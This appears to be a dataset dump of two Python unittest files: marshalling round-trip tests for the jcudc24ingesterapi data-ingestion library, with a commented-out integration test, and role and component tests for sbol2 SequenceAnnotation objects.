# result = self.ingester_platform.ping()
# self.assertEquals(result, "PONG", "Could not ping service")
#
# def test_ingest_functionality(self):
# self.region = Region(
# "Queensland",
# [(2314, 1234), (1234, 1234), (1234, 1234), (1234, 2134)]
# )
#
# self.location = Location(1234, 1234, "Example Point", 1.5, self.region)
#
# self.data_type = FileDataType()
# self.data_type.extra_data_example = BOOLEAN()
#
# self.script_handle = os.path.join(tempfile.gettempdir(), 'test_script_file.py')
# self.cleanup_files.append(self.script_handle)
#
# script = "class TestProcessingScript(_ProcessingScript):"\
# " def process_it(self, data_entry):"\
# " assertIsInstance(data_entry, FileDataType)"\
# " return {data_entry, DataEntry(data_entry.dataset, data_entry.data_type_schema, data_entry.datetime, {'processed':True})}"\
# ""
# script_file = open(self.script_handle, 'w')
# script_file.write(script)
#
# self.dataset = Dataset(self.location, self.data_type, PushDataSource(sampling_script), self.script_handle)
#
# self.data_entry = DataEntry(self.dataset, FileDataType(), 123456789,
# {"mime_type": "text/xml", "file_handle": "c:/test.xml", "extra_data_example": False})
#
# self.data_quality = Metadata(self.data_entry, QualityMetadataSchema(),
# {"description": "The entered data was invalid."})
# self.dataset_sampling_changed = Metadata(self.dataset, SampleRateMetadataSchema(),
# {"change_time": datetime.today(), "sampling": PeriodicSampling(1000)})
# # Datasets
# try:
# # Add a dataset
# self.dataset = self.ingester_platform.post(self.dataset)
#
# # Update the dataset with a ReDBox link after the metadata is entered.
# self.dataset.redbox_link = "https://eresearch.jcu.edu.au/researchdata/123456789" # After entry into ReDBox
# self.dataset = self.ingester_platform.post(self.dataset)
#
# # Change the sampling rate of the dataset
# self.dataset = self.ingester_platform.post(self.dataset_sampling_changed)
#
# # Add a manual data entry
# self.data_entry = self.ingester_platform.post(self.data_entry)
#
# # Provide quality information on the data_entry
# self.data_entry = self.ingester_platform.post(self.data_quality)
#
# # Example of searching a range
# start_search_id_range = DataEntry(data_entry_id=0)
# start_search_id_range = DataEntry(data_entry_id=self.data_entry.data_entry_id)
# found_data_entries = self.ingester_platform.get(start_search_id_range, start_search_id_range)
# found = False
# for data_entry in found_data_entries:
# if data_entry == self.data_entry:
# # Delete the data_entry
# found = True
# self.assertTrue(found, "id range search failed")
#
# a_data_entry = DataEntry(kwargs={"extra_data_example": False})
# data_entry = self.ingester_platform.get(DataEntry)
# self.ingester_platform.delete(self.auth, self.data_entry)
#
# # Get all datasets at the location
# location_search = Dataset(self.location, None, None)
# found_datasets = self.ingester_platform.get(location_search)
# found = False
# for dataset in found_datasets:
# if dataset == self.dataset:
# # Delete the dataset
# self.ingester_platform.delete(self.auth, self.dataset)
# found = True
# self.assertTrue(found, "location search failed")
#
# except UnsupportedSchemaError:
# assert True, "The data_type schema was an unknown type (this should never happen except under development"
#
# except InvalidObjectError:
# assert True, "Will occur if the model is invalid due to a not set required field or fields that are set "\
# "incorrectly (eg. data_schema is missing, location is an integer instead of a location object)"
# except UnknownObjectError:
# assert True, "Will occur if a non-ingester model object is posted. (eg. data_entry, dataset, location or metadata "\
# "are valid - sampling, data_sources or any other object are not)."
# except AuthenticationError:
# assert True, "The ingester API couldn't authenticate."
# except ValueError:
# assert True, "Any parameter that has an invalid value such as location.location_id isn't set"
# except:
# assert True, "Any other run time error that the ingester platform throws."
#
# def tearDown(self):
# self.ingester_platform.reset()
# for f_name in self.cleanup_files:
# if os.path.exists(f_name):
# try:
# os.remove(f_name)
# except:
# print "Exception: ", str(sys.exc_info())
class TestMarshaller(unittest.TestCase):
    """Test marshalling and object round-tripping through the Marshaller.

    Each test converts a domain object to its dict (DTO) form with
    ``obj_to_dict`` and back with ``dict_to_obj``, asserting that the
    reconstructed object carries the same attribute values.

    Note: the deprecated ``assertEquals`` alias (removed in Python 3.12)
    has been replaced throughout with ``assertEqual``.
    """

    def setUp(self):
        unittest.TestCase.setUp(self)
        self.marshaller = Marshaller()

    def test_schema_attributes(self):
        """A schema's typed attributes survive a dict round trip."""
        schema = DataEntryMetadataSchema()
        schema.addAttr(Double("one"))
        schema.addAttr(String("two"))
        self.assertEqual("one", schema.attrs["one"].name)
        self.assertEqual("two", schema.attrs["two"].name)
        self.assertTrue(isinstance(schema.attrs["one"], Double))
        self.assertTrue(isinstance(schema.attrs["two"], String))
        schema_dict = self.marshaller.obj_to_dict(schema)
        schema_obj = self.marshaller.dict_to_obj(schema_dict)
        self.assertEqual("one", schema_obj.attrs["one"].name)
        self.assertEqual("two", schema_obj.attrs["two"].name)
        self.assertTrue(isinstance(schema_obj.attrs["one"], Double))
        self.assertTrue(isinstance(schema_obj.attrs["two"], String))

    def test_dataset_roundtrip(self):
        """Attempt to round trip a dataset object."""
        script_contents = """Some Script
More"""
        dataset = Dataset(location=1, schema=2, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file", processing_script=script_contents), location_offset=LocationOffset(0, 1, 2))
        dataset_dict = self.marshaller.obj_to_dict(dataset)
        dataset1 = self.marshaller.dict_to_obj(dataset_dict)
        self.assertIsNotNone(dataset1, "Dataset should not be none")
        self.assertEqual(dataset1.location, dataset.location, "Location ID does not match")
        self.assertEqual(dataset1.schema, dataset.schema, "schema does not match %d!=%d"%(dataset1.schema, dataset.schema))
        self.assertEqual(dataset1.location_offset.x, 0)
        self.assertEqual(dataset1.location_offset.y, 1)
        self.assertEqual(dataset1.location_offset.z, 2)

    def test_data_entry(self):
        """A timezone-aware data entry serializes to an ISO timestamp and back."""
        # Fixed UTC instant so the expected ISO string below is deterministic.
        dt = datetime.datetime.utcfromtimestamp(1357788112)
        dt = dt.replace(tzinfo = jcudc24ingesterapi.UTC)
        data_entry = DataEntry(1, dt)
        data_entry["temp"] = 1.2
        data_entry_dto = self.marshaller.obj_to_dict(data_entry)
        self.assertEqual("2013-01-10T03:21:52.000Z", data_entry_dto["timestamp"])
        self.assertEqual(1, data_entry_dto["dataset"])
        self.assertEqual(1.2, data_entry_dto["data"]["temp"])
        data_entry_return = self.marshaller.dict_to_obj(data_entry_dto)
        self.assertEqual(data_entry.timestamp, data_entry_return.timestamp)
        self.assertEqual(data_entry.dataset, data_entry_return.dataset)
        self.assertEqual(data_entry.data["temp"], data_entry_return.data["temp"])

    def test_file_object_roundtrip(self):
        """The file object should marshall everything but the file stream."""
        data_entry = DataEntry(1)
        data_entry["temp"] = FileObject(f_path=os.path.join(
                os.path.dirname(jcudc24ingesterapi.__file__), "tests/test_ingest.xml"), mime_type="text/xml")
        data_entry_dto = self.marshaller.obj_to_dict(data_entry)
        self.assertEqual("text/xml", data_entry_dto["data"]["temp"]["mime_type"])
        data_entry_domain = self.marshaller.dict_to_obj(data_entry_dto)
        self.assertEqual("text/xml", data_entry_domain["temp"].mime_type)

    def test_unit_of_work_roundtrip(self):
        """A unit of work with one pending insert round trips intact."""
        unit = UnitOfWork(None)
        loc = Location(10, 11)
        loc.name = "Loc 1"
        unit.insert(loc)
        unit_dict = self.marshaller.obj_to_dict(unit)
        self.assertEqual("unit_of_work", unit_dict["class"])
        unit2 = self.marshaller.dict_to_obj(unit_dict)
        self.assertEqual(10.0, unit2._to_insert[0].latitude)
        self.assertEqual(11.0, unit2._to_insert[0].longitude)

    def test_special_attr(self):
        """special_attrs entries are carried through obj_to_dict."""
        loc = Location(10, 11)
        loc.correlationid = -1
        loc_dict = self.marshaller.obj_to_dict([loc], special_attrs=["correlationid"])
        self.assertEqual(1, len(loc_dict))
        self.assertEqual(-1, loc_dict[0]["correlationid"])

    def test_unit_of_work_validation(self):
        """Inserting an invalid object (missing required name) raises."""
        unit = UnitOfWork(None)
        loc = Location(10, 11)
        self.assertRaises(InvalidObjectError, unit.insert, loc)
        loc.name = "test"
        unit.insert(loc)  # Should work now.

    def test_marshaller_data_entry_schema(self):
        """A data_entry_schema dict with a file attribute unmarshals without error."""
        schema = {'attributes': [{'units': None, 'description': None, 'name': 'file', 'class': 'file'}], 'id': None, 'class': 'data_entry_schema'}
        schema = self.marshaller.dict_to_obj(schema)
# Allow running this test module directly (e.g. `python this_file.py`);
# unittest.main() discovers and runs the TestCase classes defined above.
if __name__ == '__main__':
    unittest.main()
|
import unittest
import sbol2
class TestSequenceAnnotation(unittest.TestCase):
    """Unit tests for sbol2.SequenceAnnotation role handling and component links."""

    def test_add_remove_role(self):
        """Roles accumulate in insertion order; removeRole drops by index."""
        annotation = sbol2.SequenceAnnotation()
        self.assertEqual([], annotation.roles)
        expected = []
        # Add three roles one at a time, checking the list grows in order.
        for role in (sbol2.SO_PROMOTER, sbol2.SO_MISC, sbol2.SO_CDS):
            annotation.addRole(role)
            expected.append(role)
            self.assertEqual(expected, annotation.roles)
        # Removing the middle entry (index 1) leaves the first and last roles.
        annotation.removeRole(1)
        self.assertEqual([sbol2.SO_PROMOTER, sbol2.SO_CDS], annotation.roles)

    def test_component(self):
        """Assigning a Component object stores that component's identity URI."""
        definition = sbol2.ComponentDefinition('cd')
        annotation = definition.sequenceAnnotations.create('sa')
        component = definition.components.create('c')
        annotation.component = component
        self.assertEqual(annotation.component, component.identity)
# Allow running this test module directly (e.g. `python this_file.py`);
# unittest.main() discovers and runs the TestCase classes defined above.
if __name__ == '__main__':
    unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.